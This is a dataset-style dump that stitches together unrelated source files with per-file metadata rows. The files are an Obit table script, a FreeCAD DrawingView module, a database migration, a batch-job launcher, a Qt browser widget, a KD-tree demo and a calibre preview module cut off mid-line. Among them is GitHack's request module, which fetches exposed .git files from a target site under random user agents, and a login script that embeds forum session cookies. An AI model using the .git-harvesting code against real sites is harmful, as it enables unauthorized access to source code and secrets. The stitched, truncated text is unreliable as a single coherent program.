AppendVLTable ("I2104P04.gz")
AppendVLTable ("I2104P08.gz")
AppendVLTable ("I2104P12.gz")
AppendVLTable ("I2104P16.gz")
AppendVLTable ("I2104P20.gz")
AppendVLTable ("I2104P24.gz")
AppendVLTable ("I2104P28.gz")
AppendVLTable ("I2112P52.gz")
AppendVLTable ("I2112P56.gz")
AppendVLTable ("I2118M32.gz")
AppendVLTable ("I2118M36.gz")
AppendVLTable ("I2118P32.gz")
AppendVLTable ("I2118P36.gz")
AppendVLTable ("I2120M04.gz")
AppendVLTable ("I2120M08.gz")
AppendVLTable ("I2120M12.gz")
AppendVLTable ("I2120M16.gz")
AppendVLTable ("I2120M20.gz")
AppendVLTable ("I2120M24.gz")
AppendVLTable ("I2120M28.gz")
AppendVLTable ("I2120M40.gz")
AppendVLTable ("I2120P00.gz")
AppendVLTable ("I2120P04.gz")
AppendVLTable ("I2120P08.gz")
AppendVLTable ("I2120P12.gz")
AppendVLTable ("I2120P16.gz")
AppendVLTable ("I2120P20.gz")
AppendVLTable ("I2120P24.gz")
AppendVLTable ("I2120P28.gz")
AppendVLTable ("I2120P40.gz")
AppendVLTable ("I2120P44.gz")
AppendVLTable ("I2120P48.gz")
AppendVLTable ("I2130P60.gz")
AppendVLTable ("I2130P64.gz")
AppendVLTable ("I2136M04.gz")
AppendVLTable ("I2136M08.gz")
AppendVLTable ("I2136M12.gz")
AppendVLTable ("I2136M16.gz")
AppendVLTable ("I2136M20.gz")
AppendVLTable ("I2136M24.gz")
AppendVLTable ("I2136M28.gz")
AppendVLTable ("I2136M32.gz")
AppendVLTable ("I2136M36.gz")
AppendVLTable ("I2136P00.gz")
AppendVLTable ("I2136P04.gz")
AppendVLTable ("I2136P08.gz")
AppendVLTable ("I2136P12.gz")
AppendVLTable ("I2136P16.gz")
AppendVLTable ("I2136P20.gz")
AppendVLTable ("I2136P24.gz")
AppendVLTable ("I2136P28.gz")
AppendVLTable ("I2136P32.gz")
AppendVLTable ("I2136P36.gz")
AppendVLTable ("I2136P52.gz")
AppendVLTable ("I2136P56.gz")
AppendVLTable ("I2136P68.gz")
AppendVLTable ("I2140M40.gz")
AppendVLTable ("I2140P40.gz")
AppendVLTable ("I2140P44.gz")
AppendVLTable ("I2140P48.gz")
AppendVLTable ("I2145P72.gz")
AppendVLTable ("I2145P76.gz")
AppendVLTable ("I2152M04.gz")
AppendVLTable ("I2152M08.gz")
AppendVLTable ("I2152M12.gz")
AppendVLTable ("I2152M16.gz")
AppendVLTable ("I2152M20.gz")
AppendVLTable ("I2152M24.gz")
AppendVLTable ("I2152M28.gz")
AppendVLTable ("I2152P00.gz")
AppendVLTable ("I2152P04.gz")
AppendVLTable ("I2152P08.gz")
AppendVLTable ("I2152P12.gz")
AppendVLTable ("I2152P16.gz")
AppendVLTable ("I2152P20.gz")
AppendVLTable ("I2152P24.gz")
AppendVLTable ("I2152P28.gz")
AppendVLTable ("I2154M32.gz")
AppendVLTable ("I2154M36.gz")
AppendVLTable ("I2154P32.gz")
AppendVLTable ("I2154P36.gz")
AppendVLTable ("I2200M40.gz")
AppendVLTable ("I2200P40.gz")
AppendVLTable ("I2200P44.gz")
AppendVLTable ("I2200P48.gz")
AppendVLTable ("I2200P52.gz")
AppendVLTable ("I2200P56.gz")
AppendVLTable ("I2200P60.gz")
AppendVLTable ("I2200P64.gz")
AppendVLTable ("I2200P80.gz")
AppendVLTable ("I2208M04.gz")
AppendVLTable ("I2208M08.gz")
AppendVLTable ("I2208M12.gz")
AppendVLTable ("I2208M16.gz")
AppendVLTable ("I2208M20.gz")
AppendVLTable ("I2208M24.gz")
AppendVLTable ("I2208M28.gz")
AppendVLTable ("I2208P00.gz")
AppendVLTable ("I2208P04.gz")
AppendVLTable ("I2208P08.gz")
AppendVLTable ("I2208P12.gz")
AppendVLTable ("I2208P16.gz")
AppendVLTable ("I2208P20.gz")
AppendVLTable ("I2208P24.gz")
AppendVLTable ("I2208P28.gz")
AppendVLTable ("I2212M32.gz")
AppendVLTable ("I2212M36.gz")
AppendVLTable ("I2212P32.gz")
AppendVLTable ("I2212P36.gz")
AppendVLTable ("I2212P68.gz")
AppendVLTable ("I2220M40.gz")
AppendVLTable ("I2220P40.gz")
AppendVLTable ("I2220P44.gz")
AppendVLTable ("I2220P48.gz")
AppendVLTable ("I2224M04.gz")
AppendVLTable ("I2224M08.gz")
AppendVLTable ("I2224M12.gz")
AppendVLTable ("I2224M16.gz")
AppendVLTable ("I2224M20.gz")
AppendVLTable ("I2224M24.gz")
AppendVLTable ("I2224M28.gz")
AppendVLTable ("I2224P00.gz")
AppendVLTable ("I2224P04.gz")
AppendVLTable ("I2224P08.gz")
AppendVLTable ("I2224P12.gz")
AppendVLTable ("I2224P16.gz")
AppendVLTable ("I2224P20.gz")
AppendVLTable ("I2224P24.gz")
AppendVLTable ("I2224P28.gz")
AppendVLTable ("I2224P52.gz")
AppendVLTable ("I2224P56.gz")
AppendVLTable ("I2230M32.gz")
AppendVLTable ("I2230M36.gz")
AppendVLTable ("I2230P32.gz")
AppendVLTable ("I2230P36.gz")
AppendVLTable ("I2230P60.gz")
AppendVLTable ("I2230P64.gz")
AppendVLTable ("I2230P72.gz")
AppendVLTable ("I2230P76.gz")
AppendVLTable ("I2230P84.gz")
AppendVLTable ("I2240M04.gz")
AppendVLTable ("I2240M08.gz")
AppendVLTable ("I2240M12.gz")
AppendVLTable ("I2240M16.gz")
AppendVLTable ("I2240M20.gz")
AppendVLTable ("I2240M24.gz")
AppendVLTable ("I2240M28.gz")
AppendVLTable ("I2240M40.gz")
AppendVLTable ("I2240P00.gz")
AppendVLTable ("I2240P04.gz")
AppendVLTable ("I2240P08.gz")
AppendVLTable ("I2240P12.gz")
AppendVLTable ("I2240P16.gz")
AppendVLTable ("I2240P20.gz")
AppendVLTable ("I2240P24.gz")
AppendVLTable ("I2240P28.gz")
AppendVLTable ("I2240P40.gz")
AppendVLTable ("I2240P44.gz")
AppendVLTable ("I2240P48.gz")
AppendVLTable ("I2248M32.gz")
AppendVLTable ("I2248M36.gz")
AppendVLTable ("I2248P32.gz")
AppendVLTable ("I2248P36.gz")
AppendVLTable ("I2248P52.gz")
AppendVLTable ("I2248P56.gz")
AppendVLTable ("I2248P68.gz")
AppendVLTable ("I2256M04.gz")
AppendVLTable ("I2256M08.gz")
AppendVLTable ("I2256M12.gz")
AppendVLTable ("I2256M16.gz")
AppendVLTable ("I2256M20.gz")
AppendVLTable ("I2256M24.gz")
AppendVLTable ("I2256M28.gz")
AppendVLTable ("I2256P00.gz")
AppendVLTable ("I2256P04.gz")
AppendVLTable ("I2256P08.gz")
AppendVLTable ("I2256P12.gz")
AppendVLTable ("I2256P16.gz")
AppendVLTable ("I2256P20.gz")
AppendVLTable ("I2256P24.gz")
AppendVLTable ("I2256P28.gz")
AppendVLTable ("I2300M40.gz")
AppendVLTable ("I2300P40.gz")
AppendVLTable ("I2300P44.gz")
AppendVLTable ("I2300P48.gz")
AppendVLTable ("I2300P60.gz")
AppendVLTable ("I2300P64.gz")
AppendVLTable ("I2300P80.gz")
AppendVLTable ("I2306M32.gz")
AppendVLTable ("I2306M36.gz")
AppendVLTable ("I2306P32.gz")
AppendVLTable ("I2306P36.gz")
AppendVLTable ("I2312M04.gz")
AppendVLTable ("I2312M08.gz")
AppendVLTable ("I2312M12.gz")
AppendVLTable ("I2312M16.gz")
AppendVLTable ("I2312M20.gz")
AppendVLTable ("I2312M24.gz")
AppendVLTable ("I2312M28.gz")
AppendVLTable ("I2312P00.gz")
AppendVLTable ("I2312P04.gz")
AppendVLTable ("I2312P08.gz")
AppendVLTable ("I2312P12.gz")
AppendVLTable ("I2312P16.gz")
AppendVLTable ("I2312P20.gz")
AppendVLTable ("I2312P24.gz")
AppendVLTable ("I2312P28.gz")
AppendVLTable ("I2312P52.gz")
AppendVLTable ("I2312P56.gz")
AppendVLTable ("I2315P72.gz")
AppendVLTable ("I2315P76.gz")
AppendVLTable ("I2320M40.gz")
AppendVLTable ("I2320P40.gz")
AppendVLTable ("I2320P44.gz")
AppendVLTable ("I2320P48.gz")
AppendVLTable ("I2324M32.gz")
AppendVLTable ("I2324M36.gz")
AppendVLTable ("I2324P32.gz")
AppendVLTable ("I2324P36.gz")
AppendVLTable ("I2324P68.gz")
AppendVLTable ("I2328M04.gz")
AppendVLTable ("I2328M08.gz")
AppendVLTable ("I2328M12.gz")
AppendVLTable ("I2328M16.gz")
AppendVLTable ("I2328M20.gz")
AppendVLTable ("I2328M24.gz")
AppendVLTable ("I2328M28.gz")
AppendVLTable ("I2328P00.gz")
AppendVLTable ("I2328P04.gz")
AppendVLTable ("I2328P08.gz")
AppendVLTable ("I2328P12.gz")
AppendVLTable ("I2328P16.gz")
AppendVLTable ("I2328P20.gz")
AppendVLTable ("I2328P24.gz")
AppendVLTable ("I2328P28.gz")
AppendVLTable ("I2330P60.gz")
AppendVLTable ("I2330P64.gz")
AppendVLTable ("I2336P52.gz")
AppendVLTable ("I2336P56.gz")
AppendVLTable ("I2340M40.gz")
AppendVLTable ("I2340P40.gz")
AppendVLTable ("I2340P44.gz")
AppendVLTable ("I2340P48.gz")
AppendVLTable ("I2342M32.gz")
AppendVLTable ("I2342M36.gz")
AppendVLTable ("I2342P32.gz")
AppendVLTable ("I2342P36.gz")
AppendVLTable ("I2344M04.gz")
AppendVLTable ("I2344M08.gz")
AppendVLTable ("I2344M12.gz")
AppendVLTable ("I2344M16.gz")
AppendVLTable ("I2344M20.gz")
AppendVLTable ("I2344M24.gz")
AppendVLTable ("I2344M28.gz")
AppendVLTable ("I2344P00.gz")
AppendVLTable ("I2344P04.gz")
AppendVLTable ("I2344P08.gz")
AppendVLTable ("I2344P12.gz")
AppendVLTable ("I2344P16.gz")
AppendVLTable ("I2344P20.gz")
AppendVLTable ("I2344P24.gz")
AppendVLTable ("I2344P28.gz")
# Shutdown Obit
OErr.printErr(err)
del ObitSys
| gpl-2.0 | 8,407,360,759,406,397,000 | 29.297659 | 76 | 0.75654 | false | 2.393711 | false | false | false |
Fat-Zer/FreeCAD_sf_master | src/Mod/Draft/draftobjects/drawingview.py | 14 | 8057 | # ***************************************************************************
# * Copyright (c) 2009, 2010 Yorik van Havre <[email protected]> *
# * Copyright (c) 2009, 2010 Ken Cline <[email protected]> *
# * Copyright (c) 2020 Eliud Cabrera Castillo <[email protected]> *
# * *
# * This program is free software; you can redistribute it and/or modify *
# * it under the terms of the GNU Lesser General Public License (LGPL) *
# * as published by the Free Software Foundation; either version 2 of *
# * the License, or (at your option) any later version. *
# * for detail see the LICENCE text file. *
# * *
# * This program is distributed in the hope that it will be useful, *
# * but WITHOUT ANY WARRANTY; without even the implied warranty of *
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
# * GNU Library General Public License for more details. *
# * *
# * You should have received a copy of the GNU Library General Public *
# * License along with this program; if not, write to the Free Software *
# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
# * USA *
# * *
# ***************************************************************************
"""Provides the object code for the DrawingView object (OBSOLETE).
This module is obsolete, since the Drawing Workbench stopped
being developed in v0.17.
The TechDraw Workbench replaces Drawing, and it no longer requires
a `DrawingView` object to display objects in a drawing sheet.
This module is still provided in order to be able to open older files
that use this `DrawingView` object. However, a GUI tool to create
this object should no longer be available.
"""
## @package drawingview
# \ingroup draftobjects
# \brief Provides the object code for the DrawingView object (OBSOLETE).
## \addtogroup draftobjects
# @{
from PySide.QtCore import QT_TRANSLATE_NOOP
import draftfunctions.svg as get_svg
import draftfunctions.dxf as get_dxf
import draftutils.utils as utils
import draftutils.groups as groups
from draftobjects.base import DraftObject
class DrawingView(DraftObject):
"""The DrawingView object. This class is OBSOLETE.
This object was used with the Drawing Workbench, but since this workbench
because obsolete in v0.17, the object should no longer be used.
It is retained for compatibility purposes, that is, to open older
files that may contain this object.
To produce 2D drawings, use TechDraw Workbench.
"""
def __init__(self, obj):
super(DrawingView, self).__init__(obj, "DrawingView")
_tip = QT_TRANSLATE_NOOP("App::Property",
"The linked object")
obj.addProperty("App::PropertyLink",
"Source",
"Base",
_tip)
_tip = QT_TRANSLATE_NOOP("App::Property",
"Projection direction")
obj.addProperty("App::PropertyVector",
"Direction",
"Shape View",
_tip)
_tip = QT_TRANSLATE_NOOP("App::Property",
"The width of the lines inside this object")
obj.addProperty("App::PropertyFloat",
"LineWidth",
"View Style",
_tip)
obj.LineWidth = 0.35
_tip = QT_TRANSLATE_NOOP("App::Property",
"The size of the texts inside this object")
obj.addProperty("App::PropertyLength",
"FontSize",
"View Style",
_tip)
obj.FontSize = 12
_tip = QT_TRANSLATE_NOOP("App::Property",
"The spacing between lines of text")
obj.addProperty("App::PropertyLength",
"LineSpacing",
"View Style",
_tip)
_tip = QT_TRANSLATE_NOOP("App::Property",
"The color of the projected objects")
obj.addProperty("App::PropertyColor",
"LineColor",
"View Style",
_tip)
_tip = QT_TRANSLATE_NOOP("App::Property",
"Shape Fill Style")
obj.addProperty("App::PropertyEnumeration",
"FillStyle",
"View Style",
_tip)
obj.FillStyle = ['shape color'] + list(utils.svgpatterns().keys())
_tip = QT_TRANSLATE_NOOP("App::Property",
"Line Style")
obj.addProperty("App::PropertyEnumeration",
"LineStyle",
"View Style",
_tip)
obj.LineStyle = ['Solid', 'Dashed', 'Dotted', 'Dashdot']
_tip = QT_TRANSLATE_NOOP("App::Property",
"If checked, source objects are displayed "
"regardless of being visible in the 3D model")
obj.addProperty("App::PropertyBool",
"AlwaysOn",
"View Style",
_tip)
def execute(self, obj):
"""Execute when the object is created or recomputed."""
result = ""
if hasattr(obj, "Source") and obj.Source:
if hasattr(obj, "LineStyle"):
ls = obj.LineStyle
else:
ls = None
if hasattr(obj, "LineColor"):
lc = obj.LineColor
else:
lc = None
if hasattr(obj, "LineSpacing"):
lp = obj.LineSpacing
else:
lp = None
if obj.Source.isDerivedFrom("App::DocumentObjectGroup"):
svg = ""
objs = groups.get_group_contents([obj.Source])
for o in objs:
v = o.ViewObject.isVisible()
if hasattr(obj, "AlwaysOn") and obj.AlwaysOn:
v = True
if v:
svg += get_svg.get_svg(o,
obj.Scale,
obj.LineWidth,
obj.FontSize.Value,
obj.FillStyle,
obj.Direction, ls, lc, lp)
else:
svg = get_svg.get_svg(obj.Source,
obj.Scale,
obj.LineWidth,
obj.FontSize.Value,
obj.FillStyle,
obj.Direction, ls, lc, lp)
result += '<g id="' + obj.Name + '"'
result += ' transform="'
result += 'rotate(' + str(obj.Rotation) + ','
result += str(obj.X) + ',' + str(obj.Y)
result += ') '
result += 'translate(' + str(obj.X) + ',' + str(obj.Y) + ') '
result += 'scale(' + str(obj.Scale) + ',' + str(-obj.Scale)
result += ')'
result += '">'
result += svg
result += '</g>'
obj.ViewResult = result
def getDXF(self, obj):
"""Return a DXF fragment."""
return get_dxf.get_dxf(obj)
# Alias for compatibility with v0.18 and earlier
_DrawingView = DrawingView
## @}
| lgpl-2.1 | -6,972,655,767,122,161,000 | 40.963542 | 79 | 0.462083 | false | 4.678862 | false | false | false |
dimitdim/GetARoom | Main/db_repository/versions/004_migration.py | 1 | 1360 | from sqlalchemy import *
from migrate import *
from migrate.changeset import schema
pre_meta = MetaData()
post_meta = MetaData()
post = Table('post', post_meta,
Column('id', Integer, primary_key=True, nullable=False),
Column('body', String(length=140)),
Column('timestamp', DateTime),
Column('user_id', Integer),
)
status = Table('status', post_meta,
Column('id', Integer, primary_key=True, nullable=False),
Column('start', Integer),
Column('status', Boolean),
Column('node_id', Integer),
)
user = Table('user', post_meta,
Column('id', Integer, primary_key=True, nullable=False),
Column('nickname', String(length=64)),
Column('email', String(length=120)),
Column('role', SmallInteger, default=ColumnDefault(0)),
)
def upgrade(migrate_engine):
# Upgrade operations go here. Don't create your own engine; bind
# migrate_engine to your metadata
pre_meta.bind = migrate_engine
post_meta.bind = migrate_engine
post_meta.tables['post'].create()
post_meta.tables['status'].create()
post_meta.tables['user'].create()
def downgrade(migrate_engine):
# Operations to reverse the above upgrade go here.
pre_meta.bind = migrate_engine
post_meta.bind = migrate_engine
post_meta.tables['post'].drop()
post_meta.tables['status'].drop()
post_meta.tables['user'].drop()
| gpl-2.0 | 6,732,537,120,585,568,000 | 28.565217 | 68 | 0.675 | false | 3.675676 | false | false | false |
hoidn/LCLS | dataccess/dataccess/autobatch.py | 1 | 1756 | import os
import time
import sys
import argparse
#sys.path.append('/reg/neh/home/ohoidn/anaconda/lib/python2.7/site-packages')
#sys.path.append('/reg/neh/home/ohoidn/anaconda/lib/python2.7/site-packages/pathos-0.2a1.dev0-py2.7.egg')
#sys.path.append('/reg/neh/home/ohoidn/anaconda/lib/python2.7/site-packages/dataccess-1.0-py2.7.egg')
from dataccess import data_access
from dataccess import psget
import config
d4 = psget.get_signal_bg_one_run(688, mode = 'script')
def generate_all_batches(search_range = (-float('inf'), float('inf'))):
rangemin, rangemax = search_range
all_runs = data_access.get_all_runs()
commands = []
for run in all_runs:
if run >= rangemin and run <= rangemax:
for detid in config.detID_list:
commands.append(psget.get_signal_bg_one_run(run, detid = detid, mode = 'script'))
return commands
def submit_all_batches(search_range = (-float('inf'), float('inf'))):
commands = generate_all_batches(search_range = search_range)
for command in commands:
os.system(command)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--min', type = int)
parser.add_argument('--max', type = int)
parser.add_argument('--generate', '-g', action = 'store_true')
parser.add_argument('--submit', '-s', action = 'store_true')
args = parser.parse_args()
if args.min:
amin = args.min
else:
amin = -float('inf')
if args.max:
amax = args.max
else:
amax = float('inf')
search_range = (amin, amax)
if args.generate:
generate_all_batches(search_range = search_range)
if args.submit:
submit_all_batches(search_range = search_range)
time.sleep(1000)
| gpl-3.0 | 493,112,196,730,480,000 | 32.132075 | 105 | 0.649203 | false | 3.135714 | false | false | false |
BugScanTeam/GitHack | lib/request.py | 1 | 1722 | #!/usr/bin/env python
# coding:utf-8
"""
Copyright (c) 2017 BugScan (http://www.bugscan.net)
See the file 'LICENCE' for copying permission
"""
import os
import urllib2
import random
from lib.common import writeFile
from lib.data import paths
from lib.data import target
from lib.data import agents
from lib.data import logger
from lib.settings import DEBUG
def randomAgent():
return random.choice(agents)
def request_data(url):
for i in range(3):
data = None
try:
request = urllib2.Request(url, None, {'User-Agent': randomAgent()})
data = urllib2.urlopen(request).read()
if data:
return data
except Exception, e:
if DEBUG:
logger.warning("Request Exception: %s" % str(e))
return None
def wget(filepath):
url = "%s%s" % (target.TARGET_GIT_URL, filepath)
filename = os.path.join(paths.GITHACK_DIST_TARGET_GIT_PATH, filepath)
dirname = os.path.dirname(filename)
if not os.path.exists(dirname):
os.makedirs(dirname)
data = request_data(url)
if data:
writeFile(filename, data)
if DEBUG:
logger.success("Get %s => %s" % (url, filepath))
def isdirlist():
keywords = [
"To Parent Directory",
"Index of /",
"Directory Listing For /",
"[转到父目录]",
"objects/",
]
data = request_data(target.TARGET_GIT_URL)
if data:
for key in keywords:
if key in data:
logger.info("%s is support Directory Listing" % target.TARGET_GIT_URL)
return True
logger.info("%s is not support Directory Listing" % target.TARGET_GIT_URL)
return False
| gpl-3.0 | -8,343,839,040,890,184,000 | 24.939394 | 86 | 0.607477 | false | 3.713666 | false | false | false |
csparkresearch/ExpEYES17-Qt | SPARK17/utilities/onlineBrowser.py | 1 | 2400 | # -*- coding: utf-8; mode: python; indent-tabs-mode: t; tab-width:4 -*-
import os,glob
from ..Qt import QtGui, QtCore,QtWidgets
import numpy as np
from .templates import ui_onlineBrowser as onlineBrowser
import pyqtgraph as pg
class dummyApp:
def processEvents(self):
pass
try:
import requests
except:
print ('requests library missing. online browser will not work.')
class onlineBrowser(QtWidgets.QFrame,onlineBrowser.Ui_Form):
trace_names = ['#%d'%a for a in range(10)]
trace_colors = [(0,255,0),(255,0,0),(255,255,100),(10,255,255)]
textfiles=[]
def __init__(self,*args,**kwargs):
super(onlineBrowser, self).__init__()
self.setupUi(self)
self.thumbList = {}
self.downloadedSubdir = kwargs.get('save_directory','ExpEYES_Online')
self.clickCallback = kwargs.get('clickCallback',self.showClickedFile)
self.app = kwargs.get('app',dummyApp())
def refresh(self):
self.generateItemList()
def itemClicked(self,sel):
fname = self.thumbList[str(sel)][1]
print(fname)
self.clickCallback( fname )
def clearItems(self):
for a in self.thumbList:
self.listWidget.takeItem(self.listWidget.row(self.thumbList[a][0]))
self.thumbList={}
def generateItemList(self,**kwargs):
self.clearItems()
url = self.urlEdit.text()
dlPath = url+'getStaticScripts'
print ('downloading from ',dlPath)
self.app.processEvents()
self.textfiles = []
homedir = os.path.expanduser('~')
thumbdir = os.path.join(homedir,self.downloadedSubdir)
if not os.path.isdir(thumbdir):
print ('Directory missing. Will create')
os.makedirs(thumbdir)
requests.get(dlPath,hooks=dict(response=self.processData))
def processData(self,expts,*args,**kwargs):
if expts.status_code == 200:
dirList = expts.json()['staticdata']
for a in dirList:
print ('directory :',a)
scriptList = dirList[a]['data']
for b in scriptList:
try:
#x = QtGui.QIcon(thumbpath)
fname = b['Filename']
filepath = dirList[a]['path']
item = QtGui.QListWidgetItem(fname)#x,fname)
self.listWidget.addItem(item)
self.thumbList[fname] = [item,filepath]
except Exception as e:
print( 'failed to load ',b,e)
else:
print ('got nothing. error:',expts.status_code)
def loadFromFile(self,plot,curves,filename,histMode=False):
print('what just happened?')
def showClickedFile(self):
print('what just happened?click.')
| mit | 6,077,843,050,119,777,000 | 25.966292 | 71 | 0.690833 | false | 3.084833 | false | false | false |
Franciscowxp/PySpider | login.py | 1 | 2922 | # coding=utf-8
import requests
from urllib.parse import urlparse
class Login(object):
"""docstring for Login"""
def __init__(self, **signin):
self.url = signin['url']
if not signin['verify']:
self.logindata = signin['logindata']
self.loginurl = signin['loginurl']
self.login()
else:
self.cookies = signin['cookies']
def login(self):
response = requests.post(self.loginurl, data=self.logindata)
self.cookies = response.cookies
return response
def cookie(self):
pass
def setCookies(self, dict):
self.cookies = dict
def getheader(self):
pass
def register(self):
self.setheader()
url = "http://bbs.ithome.com/plugin.php?id=dsu_paulsign:sign&operation=qiandao&infloat=1&sign_as=1&inajax=1"
data = {"formhash": "14acb1bd",
"qdxq": "nu",
"qdmode": "2",
"todaysay": "",
"fastreply": "0"}
self.cookies.update({"discuz_2132_sendmail":"1","discuz_2132_nofavfid":"1","discuz_2132_connect_is_bind":"0"})
return requests.post(url, data=data, cookies=self.cookies, headers=self.headers).text
def setheader(self):
url = urlparse(self.url)
Referer = url.scheme + "://" + url.netloc
self.headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/32.0",
"Referer": Referer,
"Host": url.netloc,
"Connection": "keep-alive",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
}
def get(self):
self.setheader()
return requests.get(self.url, cookies=self.cookies, headers=self.headers).text
def getWithCookies(self):
self.setheader()
return requests.get(self.url, cookies=self.cookies, headers=self.headers)
def postWithCookies(self):
pass
login = Login(
verify=True,
url="http://bbs.3dmgame.com/home.php?mod=task&do=apply&id=9",
loginurl="http://bbs.ithome.com/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes",
logindata={"username": "", "password": ""},
# url="http://bbs.ithome.com/home.php?mod=spacecp&ac=usergroup",
cookies=dict(
uchome_2132_auth="5b3bx5iQyK2yuyALeoJChdkEnVAbAJZnz%2FPV5yjjdfpV9nW7JWrzPG21s1Sr8zq1eTzxPYTqCNFRm36S3%2FoGduom8AHI",
uchome_2132_cookiereport="a163d4ArUbOfwx5PFQdjebMJMkqzbiRCt5N2M3%2F7yH5gpTMK%2BfCt",
uchome_2132_checkpm="0",
uchome_2132_connect_is_bind="0",
uchome_2132_home_diymode="1",
uchome_2132_lastact="1409282454%09home.php%09task",
uchome_2132_lastvisit="1409278415",
uchome_2132_noticeTitle="1",
uchome_2132_saltkey="NGlCLgkr",
uchome_2132_sid="C99oC1"
))
print(login.getWithCookies().text)
| gpl-2.0 | -2,216,983,034,984,773,400 | 33.761905 | 124 | 0.614041 | false | 3.001028 | false | false | false |
heineman/algorithms-nutshell-2ed | PythonCode/demo/app_kd_range.py | 1 | 5297 | """
Demonstration application for range search using kd tree.
Left mouse adds point.
Right mouse click begins drag of rectangle.
"""
import tkinter
from adk.kd import KDTree, X, Y, VERTICAL
from adk.region import Region, minValue, maxValue
RectangleSize = 4
class KDTreeApp:
def __init__(self):
"""App for creating KD tree dynamically and executing range queries."""
self.tree = KDTree()
self.static = False
# for range query
self.selectedRegion = None
self.queryRect = None
self.master = tkinter.Tk()
self.master.title('KD Tree Range Query Application')
self.w = tkinter.Frame(self.master, width=410, height=410)
self.canvas = tkinter.Canvas(self.w, width=400, height=400)
self.paint()
self.canvas.bind("<Button-1>", self.click)
self.canvas.bind("<Motion>", self.moved)
self.canvas.bind("<Button-3>", self.range) # when right mouse clicked
self.canvas.bind("<ButtonRelease-3>", self.clear)
self.canvas.bind("<B3-Motion>", self.range) # only when right mouse dragged
self.w.pack()
def toCartesian(self, y):
"""Convert tkinter point into Cartesian."""
return self.w.winfo_height() - y
def toTk(self,y):
"""Convert Cartesian into tkinter point."""
if y == maxValue: return 0
tk_y = self.w.winfo_height()
if y != minValue:
tk_y -= y
return tk_y
def clear(self, event):
"""End of range search."""
self.selectedRegion = None
self.paint()
def range(self, event):
"""Initiate a range search using a selected rectangular region."""
p = (event.x, self.toCartesian(event.y))
if self.selectedRegion is None:
self.selectedStart = Region(p[X],p[Y], p[X],p[Y])
self.selectedRegion = self.selectedStart.unionPoint(p)
self.paint()
# return (node,status) where status is True if draining entire tree rooted at node. Draw these
# as shaded red rectangle to identify whole sub-tree is selected.
for pair in self.tree.range(self.selectedRegion):
p = pair[0].point
if pair[1]:
self.canvas.create_rectangle(pair[0].region.x_min, self.toTk(pair[0].region.y_min),
pair[0].region.x_max, self.toTk(pair[0].region.y_max),
fill='Red', stipple='gray12')
else:
self.canvas.create_rectangle(p[X] - RectangleSize, self.toTk(p[Y]) - RectangleSize,
p[X] + RectangleSize, self.toTk(p[Y]) + RectangleSize, fill='Red')
self.queryRect = self.canvas.create_rectangle(self.selectedRegion.x_min, self.toTk(self.selectedRegion.y_min),
self.selectedRegion.x_max, self.toTk(self.selectedRegion.y_max),
outline='Red', dash=(2, 4))
def moved(self, event):
"""Only here for static option."""
if self.static:
self.paint()
def click(self, event):
"""Add point to KDtree."""
p = (event.x, self.toCartesian(event.y))
self.tree.add(p)
self.paint()
def drawPartition (self, r, p, orient):
"""Draw partitioning line and points itself as a small square."""
if orient == VERTICAL:
self.canvas.create_line(p[X], self.toTk(r.y_min), p[X], self.toTk(r.y_max))
else:
xlow = r.x_min
if r.x_min <= minValue: xlow = 0
xhigh = r.x_max
if r.x_max >= maxValue: xhigh = self.w.winfo_width()
self.canvas.create_line(xlow, self.toTk(p[Y]), xhigh, self.toTk(p[Y]))
self.canvas.create_rectangle(p[X] - RectangleSize, self.toTk(p[Y]) - RectangleSize,
p[X] + RectangleSize, self.toTk(p[Y]) + RectangleSize, fill='Black')
def visit (self, n):
""" Visit node to paint properly."""
if n == None: return
self.drawPartition(n.region, n.point, n.orient)
self.visit (n.below)
self.visit (n.above)
def prepare(self, event):
"""prepare to add points."""
if self.label:
self.label.destroy()
self.label = None
self.canvas.pack()
def paint(self):
"""Paint quad tree by visiting all nodes, or show introductory message."""
if self.tree.root:
self.canvas.delete(tkinter.ALL)
self.visit(self.tree.root)
else:
self.label = tkinter.Label(self.w, width=100, height = 40, text="Click To Add Points")
self.label.bind("<Button-1>", self.prepare)
self.label.pack()
if __name__ == "__main__":
app = KDTreeApp()
app.w.mainloop()
| mit | 6,429,294,040,961,874,000 | 34.531034 | 120 | 0.521805 | false | 3.958894 | false | false | false |
ns950/calibre | src/calibre/gui2/tweak_book/preview.py | 3 | 25045 | #!/usr/bin/env python2
# vim:fileencoding=utf-8
from __future__ import (unicode_literals, division, absolute_import,
print_function)
__license__ = 'GPL v3'
__copyright__ = '2013, Kovid Goyal <kovid at kovidgoyal.net>'
import time, textwrap, json
from bisect import bisect_right
from base64 import b64encode
from future_builtins import map
from threading import Thread
from Queue import Queue, Empty
from functools import partial
from urlparse import urlparse
from PyQt5.Qt import (
QWidget, QVBoxLayout, QApplication, QSize, QNetworkAccessManager, QMenu, QIcon,
QNetworkReply, QTimer, QNetworkRequest, QUrl, Qt, QNetworkDiskCache, QToolBar,
pyqtSlot, pyqtSignal)
from PyQt5.QtWebKitWidgets import QWebView, QWebInspector, QWebPage
from calibre import prints
from calibre.constants import iswindows
from calibre.ebooks.oeb.polish.parsing import parse
from calibre.ebooks.oeb.base import serialize, OEB_DOCS
from calibre.ptempfile import PersistentTemporaryDirectory
from calibre.gui2 import error_dialog, open_url
from calibre.gui2.tweak_book import current_container, editors, tprefs, actions, TOP
from calibre.gui2.viewer.documentview import apply_settings
from calibre.gui2.viewer.config import config
from calibre.gui2.widgets2 import HistoryLineEdit2
from calibre.utils.ipc.simple_worker import offload_worker
shutdown = object()
def get_data(name):
'Get the data for name. Returns a unicode string if name is a text document/stylesheet'
if name in editors:
return editors[name].get_raw_data()
return current_container().raw_data(name)
# Parsing of html to add linenumbers {{{
def parse_html(raw):
root = parse(raw, decoder=lambda x:x.decode('utf-8'), line_numbers=True, linenumber_attribute='data-lnum')
return serialize(root, 'text/html').encode('utf-8')
class ParseItem(object):
__slots__ = ('name', 'length', 'fingerprint', 'parsing_done', 'parsed_data')
def __init__(self, name):
self.name = name
self.length, self.fingerprint = 0, None
self.parsed_data = None
self.parsing_done = False
def __repr__(self):
return 'ParsedItem(name=%r, length=%r, fingerprint=%r, parsing_done=%r, parsed_data_is_None=%r)' % (
